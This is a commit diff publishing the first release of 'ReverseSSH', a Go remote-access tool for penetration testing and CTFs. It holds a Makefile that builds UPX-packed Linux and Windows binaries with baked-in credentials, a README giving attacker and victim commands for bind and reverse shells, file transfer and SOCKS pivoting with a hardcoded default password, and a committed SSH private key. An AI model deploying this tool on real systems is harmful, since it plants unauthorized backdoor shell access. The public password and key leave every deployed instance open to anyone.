Publish v1.0.0-alpha

Makefile

@@ -0,0 +1,26 @@
+version != git describe --tags --always --dirty
+LDFLAGS := -X 'main.version=$(version)'
+
+ifneq ($(origin RS_PUB), undefined)
+LDFLAGS := $(LDFLAGS) -X 'main.authorizedKey=$(RS_PUB)'
+endif
+
+ifeq ($(origin RS_PASS), undefined)
+RS_PASS != head -c 8 /dev/urandom | xxd -p
+endif
+LDFLAGS := $(LDFLAGS) -X 'main.localPassword=$(RS_PASS)'
+
+.PHONY: build
+build: clean
+	CGO_ENABLED=0 GOARCH=amd64	GOOS=linux	go build -ldflags="$(LDFLAGS) -s -w" -o bin/reverse-sshx64 .
+	CGO_ENABLED=0 GOARCH=386	GOOS=linux	go build -ldflags="$(LDFLAGS) -s -w" -o bin/reverse-sshx86 .
+	CGO_ENABLED=0 GOARCH=amd64	GOOS=windows	go build -ldflags="$(LDFLAGS) -s -w" -o bin/reverse-sshx64.exe .
+	CGO_ENABLED=0 GOARCH=386	GOOS=windows	go build -ldflags="$(LDFLAGS) -s -w" -o bin/reverse-sshx86.exe .
+
+.PHONY: clean
+clean:
+	rm -f bin/*reverse-ssh*
+
+.PHONY: compressed
+compressed: build
+	@for f in $(shell ls bin); do upx -o "bin/upx_$${f}" "bin/$${f}"; done

Readme.md

@@ -0,0 +1,154 @@
+# ReverseSSH
+
+**A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.**
+
+**[Get the latest Release](https://github.com/Fahrj/reverse-ssh/releases)**
+
+
+## Features
+
+Catching a reverse shell with _netcat_ is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory?
+Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.
+
+Instead you can go the way to simply deploy a **lightweight ssh server** (<1.5MB) onto the target and use additional commodities such as **file transfer** and **port forwarding**!
+
+ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation.
+Its main strengths are the following:
+
+* **Fully interactive shell access** (A fully interactive powershell on windows relies on the [Windows Pseudo Console ConPTY](https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/) and thus requires at least `Win10 Build 17763`. Before that, it still works, but you only get a somewhat interactive, generic reverse shell.)
+* **File transfer via sftp**
+* **Local / remote / dynamic port forwarding**
+* Supports **Unix** and **Windows** operating systems
+
+
+## Requirements
+
+Simply executing the provided binaries only relies on [golang system requirements](https://github.com/golang/go/wiki/MinimumRequirements#operating-systems).
+
+In short:
+
+* **Linux**: kernel version 2.6.23 and higher
+* **Windows**: Windows Server 2008R2 and higher or Windows 7 and higher
+
+Compiling additionally requires the following:
+
+* golang version 1.15
+* optionally `upx` for compression (e.g. `apt install upx-ucl`)
+
+
+## Usage
+
+```shell
+reverseSSH v1.0.0-alpha  Copyright (C) 2021  Ferdinor <[email protected]>
+
+Usage: reverse-ssh [options] [<user>@]<target>
+
+Examples:
+  Bind:
+        reverse-ssh
+        reverse-ssh -v -l :4444
+  Reverse:
+        reverse-ssh -p 31337 192.168.0.1
+        reverse-ssh -v -b 0 [email protected]
+
+Options:
+        -s, Shell to use for incoming connections, e.g. /bin/bash; no effect for windows (default: /bin/bash)
+        -l, Bind scenario only: listen at this address:port (default: :31337)
+        -p, Reverse scenario only: ssh port at home (default: 22)
+        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)
+        -v, Emit log output
+
+<target>
+        Optional target which enables the reverse scenario. Can be prependend with
+        <user>@ to authenticate as a different user than 'reverse' while dialling home.
+
+Credentials:
+        Accepting all incoming connections from any user with either of the following:
+         * Password "letmeinbrudipls"
+         * PubKey   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"
+```
+
+Once `reverse-ssh` is running, you can connect with any username and the default password `letmeinbrudipls`, the ssh key or whatever you specified during compilation.
+After all, it is just an ssh server:
+
+```shell
+# Simple, interactive shell access
+$ssh -p <RPORT> <RHOST>
+
+# Full-fledged file transfers
+$sftp -P <RPORT> <RHOST>
+
+# Dynamic port forwarding as SOCKS proxy
+$ssh -p <RPORT> -D 9050 <RHOST>
+```
+
+For even more convenience, add the following to your `~/.ssh/config`, copy the [ssh private key](id_reverse-ssh.pub) to `~/.ssh/` and simply call `ssh target` or `sftp target` afterwards:
+
+```shell
+Host target
+        Hostname 127.0.0.1
+        Port 8888
+        IdentityFile ~/.ssh/id_reverse-ssh
+        IdentitiesOnly yes
+        StrictHostKeyChecking no
+        UserKnownHostsFile /dev/null
+```
+
+### Simple bind shell scenario
+
+```shell
+# Victim
+$./reverse-ssh
+
+# Attacker (default password: letmeinbrudipls)
+$ssh -p 31337 <LHOST>
+```
+
+### Simple reverse shell scenario
+
+```shell
+# On attacker (get ready to catch the incoming request; can be omitted if you already have an ssh daemon running)
+attacker$./reverse-ssh -l :<LPORT>
+
+# On victim
+victim$./reverse-ssh -p <LPORT> <LHOST>
+# or in case of another ssh daemon listening at port 22
+victim$./reverse-ssh <USER>@<LHOST>
+
+# On attacker (default password: letmeinbrudipls)
+attacker$ssh -p 8888 127.0.0.1
+# or with ssh config from above
+attacker$ssh target
+```
+
+In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22.
+Just prepend `<USER>@` and provide the password once asked to do so.
+Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...
+
+
+## Build instructions
+
+Make sure to install the above requirements such as golang in a matching version and set it up correctly.
+Afterwards, you can compile with `make`, which will create static binaries in `bin`.
+Use `make compressed` to pack the binaries with upx to further reduce their size.
+
+```shell
+$make
+
+# or to additionally created binaries packed with upx
+$make compressed
+```
+
+You can also specify a personalized password (`RS_PASS`) or authorized key (`RS_PUB`) when compiling:
+
+```shell
+$ssh-keygen -t ed25519 -f id_reverse-ssh
+
+$RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed
+```
+
+## Contribute
+
+Is a mind-blowing feature missing? Anything not working as intended?
+
+**Create an issue or pull request!**

bin/.gitignore

@@ -0,0 +1,2 @@
+/*
+!/.gitignore

go.mod

@@ -0,0 +1,16 @@
+module reverse-ssh
+
+go 1.15
+
+require (
+	github.com/ActiveState/termtest/conpty v0.5.0
+	github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be // indirect
+	github.com/creack/pty v1.1.13
+	github.com/davecgh/go-spew v1.1.1 // indirect
+	github.com/gliderlabs/ssh v0.3.2
+	github.com/kr/pretty v0.2.1 // indirect
+	github.com/pkg/sftp v1.13.2-0.20210630171814-35cb1f0616ba
+	golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a
+	golang.org/x/sys v0.0.0-20210423185535-09eb48e85fd7
+	gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15 // indirect
+)

go.sum

@@ -0,0 +1,47 @@
+github.com/ActiveState/termtest/conpty v0.5.0 h1:JLUe6YDs4Jw4xNPCU+8VwTpniYOGeKzQg4SM2YHQNA8=
+github.com/ActiveState/termtest/conpty v0.5.0/go.mod h1:LO4208FLsxw6DcNZ1UtuGUMW+ga9PFtX4ntv8Ymg9og=
+github.com/Azure/go-ansiterm v0.0.0-20170929234023-d6e3b3328b78 h1:w+iIsaOQNcT7OZ575w+acHgRric5iCyQh+xv+KJ4HB8=
+github.com/Azure/go-ansiterm v0.0.0-20170929234023-d6e3b3328b78/go.mod h1:LmzpDX56iTiv29bbRTIsUNlaFfuhWRQBWjQdVyAevI8=
+github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be h1:9AeTilPcZAjCFIImctFaOjnTIavg87rW78vTPkQqLI8=
+github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be/go.mod h1:ySMOLuWl6zY27l47sB3qLNK6tF2fkHG55UZxx8oIVo4=
+github.com/creack/pty v1.1.13 h1:rTPnd/xocYRjutMfqide2zle1u96upp1gm6eUHKi7us=
+github.com/creack/pty v1.1.13/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
+github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/gliderlabs/ssh v0.3.2 h1:gcfd1Aj/9RQxvygu4l3sak711f/5+VOwBw9C/7+N4EI=
+github.com/gliderlabs/ssh v0.3.2/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0=
+github.com/kr/fs v0.1.0 h1:Jskdu9ieNAYnjxsi0LbQp1ulIKZV1LAFgK1tWhpZgl8=
+github.com/kr/fs v0.1.0/go.mod h1:FFnZGqtBN9Gxj7eW1uZ42v5BccTP0vu6NEaFoC2HwRg=
+github.com/kr/pretty v0.2.1 h1:Fmg33tUaq4/8ym9TJN1x7sLJnHVwhP33CNkpYV/7rwI=
+github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI=
+github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
+github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE=
+github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
+github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
+github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
+github.com/pkg/sftp v1.13.2-0.20210630171814-35cb1f0616ba h1:r19+9QrUPhH5aWfJ0QtabmoYenwQr53mebP0zIcq8wg=
+github.com/pkg/sftp v1.13.2-0.20210630171814-35cb1f0616ba/go.mod h1:3HaPG6Dq1ILlpPZRO0HVMrsydcdLt6HRDccSgb87qRg=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
+github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
+golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc=
+golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a/go.mod h1:P+XmwS30IXTQdn5tA2iutPOUgjI07+tq3H3K9MVA1s8=
+golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+golang.org/x/sys v0.0.0-20200428200454-593003d681fa/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20201119102817-f84b799fce68 h1:nxC68pudNYkKU6jWhgrqdreuFiOQWj1Fs7T3VrH4Pjw=
+golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210423185535-09eb48e85fd7 h1:iGu644GcxtEcrInvDsQRCwJjtCIOlT2V7IRt6ah2Whw=
+golang.org/x/sys v0.0.0-20210423185535-09eb48e85fd7/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
+golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
+golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15 h1:YR8cESwS4TdDjEe65xsg0ogRM/Nc3DYOhEAlW+xobZo=
+gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=

id_reverse-ssh

@@ -0,0 +1,7 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+QyNTUxOQAAACCpWycK/rnkNIKI8uEFq9rFFnDQv2PXlfUXWNzyzuwZPwAAAJi8Pg+4vD4P
+uAAAAAtzc2gtZWQyNTUxOQAAACCpWycK/rnkNIKI8uEFq9rFFnDQv2PXlfUXWNzyzuwZPw
+AAAEDExmmZPoIIugIuZfc953ApfxUonecnt0s4+0VXIJGv6KlbJwr+ueQ0gojy4QWr2sUW
+cNC/Y9eV9RdY3PLO7Bk/AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw==
+-----END OPENSSH PRIVATE KEY-----

id_reverse-ssh.pub

@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi